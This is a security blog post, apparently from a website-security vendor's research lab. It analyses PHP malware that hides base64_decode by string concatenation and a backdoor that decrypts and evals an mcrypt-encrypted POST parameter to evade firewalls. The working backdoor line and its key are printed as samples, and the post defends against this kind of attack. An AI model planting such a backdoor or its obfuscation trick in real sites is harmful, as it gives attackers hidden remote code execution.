A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is the part of the code where it is hidden:
$g___g_='base'.(32*2).'_de'.'code';
Any tool that looks for eval, followed by base64_decode, or just flags on any base64_decode usage, will not find it.
That’s just one of the common type of evasion methods used by the bad guys. Another one we see often is the mix of “preg_replace” with the “e” flag to execute (eval) the content provided. The attackers do not stop there though.
Network Evasion using mcrypt
Website firewalls are becoming more common as website owners realize the need to protect their sites, and block attacks before they can do much damage. We are seeing some new types of backdoors that are created with the purpose of evading those firewalls. Instead of sending the malicious payload over the wire, the attackers encrypt it using “mcrypt_encrypt” so anyone monitoring the traffic over the network (either with a intrusion detection system or firewall), won’t know what is being sent.
When the request arrives at the backdoor, “mcrypt_decrypt” is used, and it executes (eval’s) the bad code. This is one example of backdoor that does it:
if (isset($_POST["x63ox64e"])){eval (mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"zx73x43Tx6bwx35x",base64_decode($_POST["x63ox64e"]),MCRYPT_MODE_ECB));}exit;?>
For reference, we have it fully decoded on ddecode. It basically gets the content of the POST request variable “code” and decrypts using Rijndeal (a symmetric encryption algorithm) using the key “zsCTkw5x”. If you don’t know the key, you would never be able to decrypt what is being sent. This is the decoded snipped core of the backdoor:
eval (mcrypt_decrypt (MCRYPT_RIJNDAEL_256,"zsCTkw5x",
And we see it injected with different passwords on different sites. What is interesting is that this backdoor is not very concerned about evading file level detection, but only network-level monitoring. So they are easy to be detected once you get access to the compromised site.
As always, it shows the arms race between the attackers and the defenders. Note that even though this type of backdoor can’t really be decoded or analyzed at the network level, anyone using our Website Firewall are protected due to our virtual hardening.
Very useful and supportive article. I wish I can do all of that in a short period of time.
just do in php 5.3